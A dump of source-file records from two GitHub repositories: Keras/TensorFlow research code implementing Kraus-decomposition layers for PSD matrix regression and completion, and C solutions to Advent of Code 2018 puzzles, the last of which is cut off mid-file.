super(KrausLayer, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n # Create a trainable weight variable for this layer.\r\n self.Ai = self.add_weight(name=\"Ai\", shape=(self.rank, self.output_dim, input_shape[-1]), initializer='glorot_uniform', trainable=True)\r\n super(KrausLayer, self).build(input_shape) \r\n\r\n def call(self, x):\r\n\r\n tmp = K.dot(self.Ai[0], x)\r\n tmp = K.permute_dimensions(tmp, [1,0,2])\r\n Y0 = K.dot(tmp, tf.transpose(self.Ai[0]))\r\n acc = [Y0]\r\n for r in range(1, self.rank):\r\n tmp = K.dot(self.Ai[r], x)\r\n tmp = K.permute_dimensions(tmp, [1,0,2])\r\n Yr = K.dot(tmp, tf.transpose(self.Ai[r]))\r\n acc.append(Yr)\r\n Y = tf.reduce_sum(acc, axis=0)\r\n return Y\r\n\r\n def compute_output_shape(self, input_shape):\r\n return (input_shape[0], self.output_dim, self.output_dim)\r\n\r\n" }, { "alpha_fraction": 0.5723270177841187, "alphanum_fraction": 0.590745747089386, "avg_line_length": 29.488584518432617, "blob_id": "d2e9e6be29b695cdd44486c671bf0f6185491395", "content_id": "5ac528502872f93f99b99314e0fe65acbf955bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6678, "license_type": "no_license", "max_line_length": 387, "num_lines": 219, "path": "/completion_kraus.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "# script to build deep kraus model for SPD matrix completion \n# train and evaluate from data generated by make_data_completion.py\n#\n\nfrom __future__ import print_function\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\nimport matplotlib.pyplot as plt\nimport keras\nfrom keras.models import Sequential\nfrom keras import backend as K\nfrom keras.layers import Activation, Dropout, BatchNormalization\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\nfrom KrausLayer import KrausLayer\nfrom PSDReluLayer import PSDReluLayer\nimport tensorflow as tf\nimport numpy as np\nimport sys\n\ndef mse_masked_loss(y_true, y_pred):\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n diff = tf.multiply(tf.square(y_pred-y_true), mask)\n loss = tf.reduce_mean(diff)\n return loss\n\nrescale_prediction = True\n\nbatch_size = 4\nepochs = 50\n\n#context=\"100_7_4_3\"\n\ntry:\n context = sys.argv[1]\n fold = int(sys.argv[2])\nexcept:\n fold = 0\n print('usage: '+sys.argv[0]+' <context> <fold> <rank> <depth> <intermediate_dims>')\n print('default: fold = 0; rank = 10; depth = 1 ; intermediate_dims = 15')\n\ncontext2 = context + '_'+str(fold)\nprint('context', context, context2)\nn = int(context.split('_')[0])\n\ntry:\n rank = int(sys.argv[3])\nexcept:\n rank = 10\n\ntry:\n depth = int(sys.argv[4])\n intermediate_dims = int(sys.argv[5])\nexcept:\n depth = 1\n intermediate_dims = -1\n\ntry:\n nl = int(sys.argv[6]) # non linearity\nexcept:\n nl = 0\n\ntry:\n eps = float(sys.argv[7])\nexcept:\n eps = 0.0001\n\nfilename = 'results_completion3/'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'_'+str(eps)+'.out'\nprint(filename)\n\n# reset given model\ndef reset_weights(model):\n session = K.get_session()\n for layer in model.layers: \n if isinstance(layer, keras.engine.network.Network):\n reset_weights(layer)\n continue\n for v in layer.__dict__.values():\n if hasattr(v, 'initializer'):\n v.initializer.run(session=session)\n\n# the data, generated by toy_experiments.py\ntry:\n M = np.load('data/completion/M_'+context2+'.npy')\nexcept:\n M = np.load('data/completion/M_'+context+'.npy')\nM_atrou = np.load('data/completion/M_atrou_'+context2+'.npy')\nX = np.load('data/completion/X_'+context2+'.npy')\nY = np.load('data/completion/Y_'+context2+'.npy')\nXt = np.load('data/completion/Xt_'+context2+'.npy')\nYt = np.load('data/completion/Yt_'+context2+'.npy')\n\nn_max = 3500\nn = X.shape[0]\nif n > n_max:\n l_idx = list(range(n_max))\n np.random.shuffle(l_idx)\n l_idx = l_idx[:n_max]\n X = X[l_idx]\n Y = Y[l_idx]\n\np = X.shape[-1]\nq = Y.shape[-1]\n\nvmin = float(np.min(M))\nvmax = float(np.max(M))\n\ninput_shape = X[0].shape\n\nmodel = Sequential()\n\nfor d in range(depth):\n dims = intermediate_dims\n if d == depth - 1: dims = Y[0].shape[0]\n if d == 0: model.add(KrausLayer(dims, rank, input_shape=input_shape))\n else: model.add(KrausLayer(dims, rank))\n if nl > 0 and d < depth - 1: model.add(PSDReluLayer(eps))\nprint(model.summary())\nmodel.compile(loss=mse_masked_loss, optimizer=keras.optimizers.Adam())\n\nscores = []\ndiffs = []\nrepeat = 1\nbest = 10000\nfor i in range(repeat): # repeat learning n times\n reset_weights(model)\n loss = model.fit(X, Y, batch_size=batch_size, epochs=epochs, verbose=1)\n mse = model.evaluate(Xt, Yt, verbose=0)\n scores.append(mse)\n print('mse = ', mse)\n\n ## reconstruct complete M matrix\n mat = np.array(M_atrou)\n mat_atrou = np.array(M_atrou)\n\n # make mask\n mask = np.array(M_atrou)\n mask[mask > 0.] = 1.\n\n # make reverse mask\n rmask = np.array(M_atrou)\n rmask[rmask > 0.] = -1.\n rmask[rmask == 0.] = 1.\n rmask[rmask == -1.] = 0.\n\n # predict and only replace missing values\n Ypred = model.predict(Xt)\n for j in range(Xt.shape[0]):\n c = np.where(Xt[j] == 1.)\n p1, p2 = int(c[0]), int(c[1])\n idx = slice(p1*q,(p1+1)*q)\n idy = slice(p2*q,(p2+1)*q)\n \n # rescale prediction to fit existing entries\n if rescale_prediction:\n mask = np.array(Yt[j])\n mask[mask > 0.] = 1.\n yt = np.multiply(Yt[j], mask)\n yp = np.multiply(Ypred[j], mask)\n \n try:\n emin = np.min(yt[np.nonzero(yt)])\n emax = np.max(yt[np.nonzero(yt)])\n except:\n emin = 0.\n emax = 1.\n \n try:\n pmin = np.min(yp[np.nonzero(yp)])\n pmax = np.max(yp[np.nonzero(yp)])\n except:\n pmin = 0.\n pmax = 1.\n\n if pmax - pmin > 0.00001:\n Ypred[j] = (Ypred[j] - pmin) / (pmax - pmin)\n else:\n Ypred[j] = Ypred[j] - pmin\n if emax - emin > 0.00001:\n Ypred[j] = Ypred[j] * (emax - emin) + emin\n else:\n Ypred[j] = Ypred[j] + emin\n \n mat[idx, idy] += np.multiply(Ypred[j], rmask[idx, idy])\n \n # evaluate difference with original matrix\n diff = np.linalg.norm(M - mat)\n diffs.append(diff)\n print('diff:', diff, 'diff_atrou', np.linalg.norm(M - mat_atrou))\n \n if (diff > 1000): sys.exit(0)\n\n if diff < best:\n diff = best\n # save only the best fold\n plt.figure()\n plt.matshow(M, fignum=False, vmin=vmin, vmax=vmax)\n plt.savefig('results_completion3/M_orig_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'.png')\n plt.close()\n\n plt.figure()\n plt.matshow(mat_atrou, fignum=False, vmin=vmin, vmax=vmax)\n plt.savefig('results_completion3/M_atrou_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'.png')\n plt.close()\n\n plt.figure()\n plt.matshow(mat, fignum=False, vmin=vmin, vmax=vmax)\n plt.savefig('results_completion3/M_compl_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'_'+str(eps)+'.png')\n plt.close()\n\n np.save('results_completion3/M_compl_'+str(context2)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'_'+str(eps)+'.npy', mat)\n\nprint('mean mse:', np.mean(scores), np.std(scores))\nprint('mean diff:', np.mean(diffs), np.std(diffs))\n\nf = open(filename, 'w')\nf.write('Train loss: '+ str(loss.history['loss'][-1])+ ' Test loss: '+ str(np.mean(scores))+' '+ str(np.std(scores))+' Norm: ' + str(np.mean(diffs)) + ' ' + str(np.std(diffs)) + ' n: '+ str(n)+' '+ str(fold)+ ' rank: '+ str(rank)+ ' depth: '+ str(depth)+ ' intermediate_dims: '+ str(intermediate_dims)+ ' nl: '+ str(nl)+' eps: '+str(eps)+ ' nb_params '+ str(model.count_params()) + '\\n')\nf.close()\n\n" }, { "alpha_fraction": 0.6744412183761597, "alphanum_fraction": 0.738581120967865, "avg_line_length": 34.44827651977539, "blob_id": "20e63101602872d493cad838f43f9aabeece62a6", "content_id": "2fa01dec5d0a9926397d6686f13702561ced2aaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 131, "num_lines": 29, "path": "/README.md", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "# partial_trace_kraus\n\nThis repository contains the code for the paper \"Partial Trace Regression and Low-Rank Kraus Decomposition\" published at ICML 2020.\n\nhttps://arxiv.org/pdf/2007.00935.pdf\n \nThis repository is still in construction.\n\n# Required environment\n - Anaconda3\n - TensorFlow 1.13.1 \n - Keras 2.2.4\n - torch 1.1.0\n\n# Code to build models\n - KrausLayer.py : implements Kraus decomposition as a keras layer\n - PSDReluLayer.py : relu for PSD matrix\n - spd2spd_kraus.py : PSD to PSD matrix regression, section 3.1\n - completion_kraus.py : PSD matrix completion, section 3.2\n\n# To generate simulated data\n - make_data_spd2spd.py generates toy data for PSD to PSD matrix regression\n - make_data_completion.py generates toy data for PSD matrix completion\n - util.py is required for previous scripts to build kraus model\n\n# To execute the code\n* run for example (see the code files for args): \n - python spd2spd_kraus.py 10000_20_10_5 0 5 2 15 1 0.1\n - python completion_kraus.py 90_20_10_0_4 0 50 2 50 1 0.1\n\n" }, { "alpha_fraction": 0.5488647818565369, "alphanum_fraction": 0.5676209330558777, "avg_line_length": 29.696969985961914, "blob_id": "dd491e94477589708f7b79cfb2d79ba316d8b6b9", "content_id": "c65342c0b358fb1b260a2c94294d5dc46724134a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 93, "num_lines": 33, "path": "/make_data_spd2spd.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Generates various toy data for PSD to PSD experiments\n\nimport sys\nimport numpy as np\nimport torch\nfrom util import build_random_A, build_X, build_Y\n\nnoise = 0.1 \n\n\ndevice = torch.device('cpu') #('cuda')\n\nt = 1\nn, n_test = int(sys.argv[1]), 1000\nm = int(sys.argv[2]) # kraus rank \nd, p = int(sys.argv[3]), int(sys.argv[4])\n\nnb_trial = 10\n\nfor i in range(nb_trial):\n \n A = build_random_A(m,p,d,device = device)\n X = build_X(n,d,device)\n Y = build_Y(n,X,A,noise = noise,device = device)\n Xt = build_X(n_test,d,device)\n Yt = build_Y(n_test,Xt,A,noise = noise,device = device)\n\n np.save('data/spd2spd/X_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', X)\n np.save('data/spd2spd/Y_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', Y)\n np.save('data/spd2spd/Xt_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', Xt)\n np.save('data/spd2spd/Yt_'+str(n)+'_'+str(d)+'_'+str(p)+'_'+str(m)+'_'+str(i)+'.npy', Yt)\n" }, { "alpha_fraction": 0.6347492933273315, "alphanum_fraction": 0.6570334434509277, "avg_line_length": 30.217391967773438, "blob_id": "54af3e6787ab388c0fde51529ab237fa65233635", "content_id": "fc8aa76757d87ba0f602887e7497de603cd45508", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2872, "license_type": "no_license", "max_line_length": 320, "num_lines": 92, "path": "/spd2spd_kraus.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "# script to build a deep kraus decomposition model for SPD to SPD matrices mapping\n# train and evaluate on toy data generated by make_data.sh\n\nfrom __future__ import print_function\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\nimport keras\nfrom keras.models import Sequential\nfrom keras import backend as K\nfrom keras.layers import Activation, Dropout, BatchNormalization\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\nfrom KrausLayer import KrausLayer\nfrom PSDReluLayer import PSDReluLayer\nimport numpy as np\nimport sys\n\nbatch_size = 16\nepochs = 200\n\ncontext = '10000_100_40_20'\n\ntry:\n context = str(sys.argv[1])\n fold = int(sys.argv[2])\nexcept:\n fold = 0\n print('usage: '+sys.argv[0]+' <context> <fold> <rank> <depth> <intermediate_dims>')\n print('default: rank = 10; depth = 1 ; intermediate_dims = 15')\n sys.exit(0)\n\ncontext2 = context + '_' + str(fold)\n\ntry:\n rank = int(sys.argv[3])\nexcept:\n rank = 10\n\ntry:\n depth = int(sys.argv[4])\n intermediate_dims = int(sys.argv[5])\nexcept:\n depth = 1\n intermediate_dims = -1\n\ntry:\n nl = int(sys.argv[6]) # non linearity ?\nexcept:\n nl = 0\n\ndef reset_weights(model):\n session = K.get_session()\n for layer in model.layers: \n if isinstance(layer, keras.engine.network.Network):\n reset_weights(layer)\n continue\n for v in layer.__dict__.values():\n if hasattr(v, 'initializer'):\n v.initializer.run(session=session)\n\n# load the data, generated by toy_experiments.py\nX = np.load('data/spd2spd/X_'+context2+'.npy')\nY = np.load('data/spd2spd/Y_'+context2+'.npy')\nXt = np.load('data/spd2spd/Xt_'+context2+'.npy')\nYt = np.load('data/spd2spd/Yt_'+context2+'.npy')\n\ninput_shape = X[0].shape\n\n# build model\nmodel = Sequential()\nfor d in range(depth):\n dims = intermediate_dims\n if d == depth - 1: dims = Y[0].shape[0]\n if d == 0: model.add(KrausLayer(dims, rank, input_shape=input_shape))\n else: model.add(KrausLayer(dims, rank))\n if nl > 0 and d < depth - 1: model.add(PSDReluLayer(0.1))\nprint(model.summary())\nmodel.compile(loss=keras.losses.mse, optimizer=keras.optimizers.Adam(0.001))\n\n# train and evaluate\nscores = []\nfor i in range(5):\n reset_weights(model)\n loss = model.fit(X, Y, batch_size=batch_size, epochs=epochs, verbose=1)\n mse = model.evaluate(Xt, Yt, verbose=0)\n scores.append(mse)\n print(\"mse = \", mse, \"iter = \", i)\n \nf = open('results_spd2spd/'+str(context)+'_'+str(fold)+'_'+str(rank)+'_'+str(depth)+'_'+str(intermediate_dims)+'_'+str(nl)+'.out', 'w')\nf.write('Train loss: '+ str(loss.history['loss'][-1])+ ' Test loss: '+ str(np.mean(scores))+' '+ str(np.std(scores))+ ' context: '+ str(context)+' '+ str(fold)+ ' rank: '+ str(rank)+ ' depth: '+ str(depth)+ ' intermediate_dims: '+ str(intermediate_dims)+ ' nl '+ str(nl)+ ' nb_params '+ str(model.count_params()) + '\\n')\nf.close()\n" }, { "alpha_fraction": 0.4763142168521881, "alphanum_fraction": 0.4933040142059326, "avg_line_length": 32.80067443847656, "blob_id": "69a37bfcef63af957f11efabe894cc7cb41483ed", "content_id": "24c844b4ff941b09b6324e6f5331a91a90d45ac3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10006, "license_type": "no_license", "max_line_length": 125, "num_lines": 296, "path": "/make_data_completion.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Genereates various toy data for PSD matrix completion experiments\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom util import build_random_A, build_X, build_Y\nimport argparse\n\n\ndef completion_accuracy(orig, pred):\n\n if np.linalg.norm(pred, ord='fro') == 0: #\n return 1 - np.trace(np.dot(orig, pred)) / np.linalg.norm(orig, ord='fro')\n\n return 1 - np.trace(np.dot(orig, pred))/(np.linalg.norm(orig, ord='fro')*np.linalg.norm(pred, ord='fro'))\n\n\ndef mat_to_vec(X, Y):\n n = X.shape[0]\n d = X.shape[1]\n p = Y.shape[1]\n Xnp = np.zeros((n, (d * d)))\n Ynp = np.zeros((n, (p * p)))\n for i in range(n):\n aux = X[i].numpy()\n Xnp[i] = np.reshape(aux, -1)\n aux = Y[i].numpy()\n Ynp[i] = np.reshape(aux, -1)\n return Xnp, Ynp\n\n\ndef vec_to_mat(Xv, Yv):\n n = Xv.shape[0]\n d = int(np.sqrt(Xv.shape[1]))\n p = int(np.sqrt(Yv.shape[1]))\n X = np.zeros((n, d, d))\n Y = np.zeros((n, p, p))\n for ii in range(n):\n aux = Xv[ii].detach().numpy()\n X[ii] = np.reshape(aux, (d, d), order='F')\n aux = Yv[ii].detach().numpy()\n Y[ii] = np.reshape(aux, (p, p), order='F')\n return X, Y\n\n\ndef vec_to_mat1(Yv):\n n = Yv.shape[0]\n pp = int(np.sqrt(Yv.shape[1]))\n Y = np.zeros((n, pp, pp))\n for ii in range(n):\n aux = Yv[ii]\n Y[ii] = np.reshape(aux, (pp, pp), order='F')\n return Y\n\n# ================= parameters =================\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-n', action='store', dest='n', default=24, type=int,\n help='number of samples ')\nparser.add_argument('-p', action='store', dest='p', default=7, type=int,\n help='dataset type ') # ok\nparser.add_argument('-q', action='store', dest='q', default=4, type=int,\n help='dataset type ') # ok\nparser.add_argument('-r', action='store', dest='r', default=10, type=int,\n help='kraus rank ') # ok\nparser.add_argument('-m', action='store', dest='m', default=14, type=int,\n help='dataset type ')\n\narguments = parser.parse_args()\nn = arguments.n # number of samples per class\np = arguments.p\nq = arguments.q\nr = arguments.r\nm = arguments.m # method of trou creation\n# noise = arguments.s\n\n\n# ================= get the data =================\n\n\nif m < 3 and n%2 != 0: # if can't make symmetric matrices with this n take one less training sample\n n = n-1\n\n\ndevice = torch.device('cpu') #('cuda')\nnoise = 0.1\n#r = 10\n\n# experiments over various random matrices to be completed\nfor o in range(1):\n\n # block matrix to be completed, symmetric psd of rank r\n np.random.seed(o)\n \n A = build_random_A(r,q,p,device = device)\n XX = []\n for i in range(p):\n for j in range(p):\n mm = np.zeros((p,p))\n mm[i,j] = 1.\n XX.append(mm)\n XX = np.array(XX)\n XXX = torch.tensor(XX, device=device).float()\n YYY = build_Y(len(XXX),XXX,A,noise = noise,device = device)\n YYY = YYY.numpy()\n\n M = np.zeros((p*q, p*q))\n i = 0\n for p1 in range(p):\n for p2 in range(p):\n M[p1*q:(p1+1)*q, p2*q:(p2+1)*q] = YYY[i]\n i+=1\n\n if np.min(M) < 0: M += -2* np.min(M)\n np.save('data/completion/M_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'.npy', M)\n \n Y = M\n Ycorrect = M # for compatibility\n\n n_tot = p**2\n # n = 25\n t = n_tot - n\n print(\"ntot, n, t, p, q\", n_tot, n, t, p, q)\n\n # put to right format\n X_all = torch.zeros((n_tot, p, p), device='cpu')\n Y_all = torch.zeros((n_tot, q, q), device='cpu')\n Y_all_correct = torch.zeros((n_tot, q, q), device='cpu')\n for p1 in range(p):\n for p2 in range(p):\n Y_all[p1*p+p2, :, :] = torch.from_numpy(Y[p1*q:(p1+1)*q, p2*q:(p2+1)*q])\n Y_all_correct[p1*p+p2, :, :] = torch.from_numpy(Ycorrect[p1*q:(p1+1)*q, p2*q:(p2+1)*q])\n tmp = np.zeros((p, p))\n tmp[p1, p2] = 1\n X_all[p1*p+p2, :, :] = torch.from_numpy(tmp)\n\n\n def get_mat_from_torch_array(ta, p, q):\n mat = np.zeros((p*q, p*q))\n # print(ta.shape, p, q)\n for p1 in range(p):\n for p2 in range(p):\n # print(ta[p1*p+p2, :, :].shape)\n # print(mat[p1*q:(p1+1)*q, p2*q:(p2+1)*q].shape)\n mat[p1*q:(p1+1)*q, p2*q:(p2+1)*q] = ta[p1*p+p2, :, :] # todo rows and cols the other way around?\n return mat\n\n N = 6 # number of elements in lambda vector\n rank = m # reduced rank regression\n\n lambda_vec = np.logspace(-3, 2, N) # all right, I guess?\n print(lambda_vec)\n print()\n\n device = 'cpu'\n nb_iter = 5\n for ii in range(nb_iter):\n \n\n # # ----- just random -----\n np.random.seed(ii) # always leave the random seed undommented for reproducible results!\n \n # any blocs can be removed, preserve symetry\n if m == 0:\n ordertmp = np.random.permutation(n_tot)\n # check for symetry!\n order = ordertmp[:int(n/2)].tolist()\n order2 = list(order)\n for o in order:\n ix = int(o / p)\n jx = int(o % p)\n order2.append(jx*p+ix)\n order2 = list(set(order2))\n if len(order2) < n:\n print(\"missing!\")\n nn = len(order2)\n diag = np.arange(0, p)*(p+1)\n np.random.shuffle(diag)\n for _ in range(n-nn):\n iii = 0\n cont = True\n while iii < len(diag) and cont:\n if diag[iii] not in order2: \n order2.append(diag[iii])\n cont = False\n iii = iii + 1\n order = np.array(order2)\n all = np.arange(0, p*p)\n others = np.array(list(set(all)-set(order)))\n order = np.append(order, others)\n\n # # ----- keep only diagonal blocs -----\n if m == 1:\n order = np.arange(0, p)*(p+1)\n n = len(order)\n all = np.arange(0, p*p)\n nondiag = np.array(list(set(all)-set(order)))\n order = np.append(order, nondiag)\n\n # ----- keep off-diagonal blocs -----\n if m == 2:\n order = np.arange(0, p)*(p+1)\n all = np.arange(0, p*p)\n trainingsamples = np.array(list(set(all)-set(order)))\n # order contains nondiag.. add missing elements here!\n while len(trainingsamples) > n:\n elem = np.random.choice(trainingsamples)\n [elemrow, elemcol] = np.unravel_index(elem, (p, p))\n elem2 = np.ravel_multi_index((elemcol, elemrow), (p, p))\n order = np.append(order, [elem, elem2])\n trainingsamples = np.array(list(set(all)-set(order)))\n order = np.append(trainingsamples, order)\n \n nm = n\n if m < 3:\n X_ = X_all[order[:nm], :, :]\n Xt_ = X_all[order[nm:], :, :]\n Y_ = Y_all[order[:nm], :, :]\n Yt_ = Y_all[order[nm:], :, :]\n\n # ------- create random missing entries not in blocs, but symmetric ---\n if m == 3:\n coord = []\n for i in range(p*q):\n for j in range(p*q):\n if j <= i: coord.append((i,j))\n np.random.shuffle(coord)\n coord = coord[:int(n/2)]\n coord2 = list(coord)\n for o in coord:\n ix = o[0]\n jx = o[1]\n coord2.append((jx,ix))\n coord2 = list(set(coord2))\n mask = np.zeros((p*q, p*q))\n for cc in coord2:\n mask[cc[0], cc[1]] = 1.\n\n # create training set, keep only blocs with enough data, currently at least 1. # 25%\n M_atrou = M * mask\n Y_all = torch.zeros((n_tot, q, q), device='cpu')\n trainset = []\n for p1 in range(p):\n for p2 in range(p):\n if np.sum(mask[p1*q:(p1+1)*q, p2*q:(p2+1)*q]) > 0: # it's a bloc with enough entries to put in training set\n trainset.append(p1*p+p2)\n Y_all[p1*p+p2, :, :] = torch.from_numpy(M_atrou[p1*q:(p1+1)*q, p2*q:(p2+1)*q])\n order = np.arange(0, p*p)\n \n\n nm = len(order)\n X_ = X_all[trainset, :, :]\n Xt_ = X_all[order[:nm], :, :]\n Y_ = Y_all[trainset, :, :]\n Yt_ = Y_all[order[:nm], :, :]\n\n\n \n X = X_.numpy()\n Xt = Xt_.numpy()\n Y = Y_.numpy()\n Yt = Yt_.numpy()\n\n print(X.shape, Xt.shape)\n np.save('data/completion/X_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', X_.numpy())\n np.save('data/completion/Xt_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', Xt_.numpy())\n np.save('data/completion/Y_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', Y_.numpy())\n np.save('data/completion/Yt_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', Yt_.numpy())\n\n ## reconstruct complete M matrix\n mat = np.array(M)\n\n if m == 3: \n mat_atrou = M_atrou\n else:\n mat_atrou = np.array(M)\n for j in range(Xt.shape[0]):\n c = np.where(Xt[j] == 1.)\n p1, p2 = int(c[0]), int(c[1])\n mat_atrou[p1*q:(p1+1)*q, p2*q:(p2+1)*q] = np.zeros(Yt[0].shape)\n\n cmap = plt.cm.pink\n vmin = float(np.min(mat))\n vmax = float(np.max(mat))\n\n plt.figure()\n plt.matshow(mat, fignum=False, vmin=vmin, vmax=vmax, cmap=cmap)\n plt.savefig('data/completion/M_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.png')\n \n plt.figure()\n plt.matshow(mat_atrou, fignum=False, vmin=vmin, vmax=vmax, cmap=cmap)\n plt.savefig('data/completion/M_atrou_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.png')\n \n np.save('data/completion/M_atrou_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', mat_atrou)\n\n" } ]
8
pwmoore/AdventOfCode2018
https://github.com/pwmoore/AdventOfCode2018
a2c94dd802e8f7f3d0fc8d674f502322a00bbdfb
2841b7186d5035d1abb97c2ccd1508b561128895
136bbc816ffda2fc2b0569ff4185ce350133590d
refs/heads/master
2020-04-10T08:48:12.704227
2018-12-17T04:48:52
2018-12-17T04:48:52
160,915,335
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5030978918075562, "alphanum_fraction": 0.5111523866653442, "avg_line_length": 23.830768585205078, "blob_id": "5790292cc53a2308323c37578bfe300a2e84e10a", "content_id": "d30fc649a9322af63070df777d76746525738799", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1614, "license_type": "permissive", "max_line_length": 86, "num_lines": 65, "path": "/Day1/Day1.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <errno.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <glib-2.0/gmodule.h>\n#include <bsd/stdlib.h>\n\nint main(int argc, char *argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input file]\\n\", getprogname());\n exit(EXIT_FAILURE);\n }\n\n char *filename = argv[1];\n FILE *fp = fopen(filename, \"r\");\n if (NULL == fp) {\n printf(\"Could not open %s: %s\\n\", filename, strerror(errno));\n exit(EXIT_FAILURE);\n }\n\n char *line = NULL;\n size_t len = 0;\n ssize_t read = 0;\n\n int linecount = 0;\n \n while ((read = getline(&line, &len, fp)) != -1) {\n linecount++;\n }\n\n rewind(fp);\n\n GHashTable *ht = g_hash_table_new_full(g_direct_hash, g_direct_equal, NULL, NULL);\n int *vals = calloc(linecount, sizeof(int));\n \n int sum = 0;\n int i = 0;\n while ((read = getline(&line, &len, fp)) != -1) {\n int val = strtol(line, NULL, 0);\n sum += val;\n vals[i++] = val;\n if (g_hash_table_contains(ht, GINT_TO_POINTER(sum))) {\n printf(\"Found it: %d\\n\", sum);\n return EXIT_SUCCESS;\n }\n g_hash_table_add(ht, GINT_TO_POINTER(sum));\n }\n\n bool found = false;\n while (!found) {\n for (i = 0; i < linecount; ++i) {\n sum += vals[i];\n if (g_hash_table_contains(ht, GINT_TO_POINTER(sum))) {\n printf(\"Found it: %d\\n\", sum);\n return EXIT_SUCCESS;\n }\n g_hash_table_add(ht, GINT_TO_POINTER(sum));\n } \n }\n\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.43459752202033997, "alphanum_fraction": 0.4632352888584137, "avg_line_length": 23.60952377319336, "blob_id": "38f3e943289b201ba3692f6190e31eda00c94515", "content_id": "18dcec19e0c98026253f658beef3e49517578049", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2584, "license_type": "permissive", "max_line_length": 74, "num_lines": 105, "path": "/Day2/Day2.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\nvoid count_letters(line_t *line, bool *counts2, bool *counts3)\n{\n unsigned long num2s = 0, num3s=0;\n unsigned long char_counts[26] = {0};\n for (size_t i = 0; i < line->len; ++i) {\n int index = line->str[i] - 'a';\n unsigned long oldcnt = char_counts[index];\n unsigned long newcnt = char_counts[index] + 1;\n if (oldcnt == 2 && newcnt > 2) {\n num2s--;\n } else if (oldcnt == 3 && newcnt > 3) {\n num3s--;\n } \n \n if (newcnt == 2) {\n num2s++;\n } else if (newcnt == 3) {\n num3s++;\n }\n\n char_counts[index] = newcnt;\n }\n\n if (num2s > 0) {\n *counts2 = true;\n }\n\n if (num3s > 0) {\n *counts3 = true;\n }\n}\n\nint hamming_distance(line_t *l1, line_t *l2, char *outstr)\n{\n int hd = 0;\n int out_index = 0;\n for (size_t i = 0; i < l1->len; ++i) {\n if (l1->str[i] != l2->str[i]) {\n hd++;\n } else {\n outstr[out_index++] = l1->str[i];\n }\n }\n\n return hd;\n}\n\nint main(int argc, char *argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_get_lines(argv[1], NULL, NULL, NULL);\n DIE_IF((file == NULL), \"Could not read lines from %s\\n\", argv[1]);\n\n uint64_t num2s = 0, num3s = 0;\n line_t *line = NULL;\n for (uint32_t i = 0; i < file_line_count(file); ++i) {\n line = file_get_line(file, i);\n bool count2 = false, count3 = false;\n count_letters(line, &count2, &count3);\n if (count2) {\n num2s++;\n }\n\n if (count3) {\n num3s++;\n }\n }\n\n printf(\"result: (%lu * %lu) = %lu\\n\", num2s, num3s, (num2s * num3s));\n\n size_t 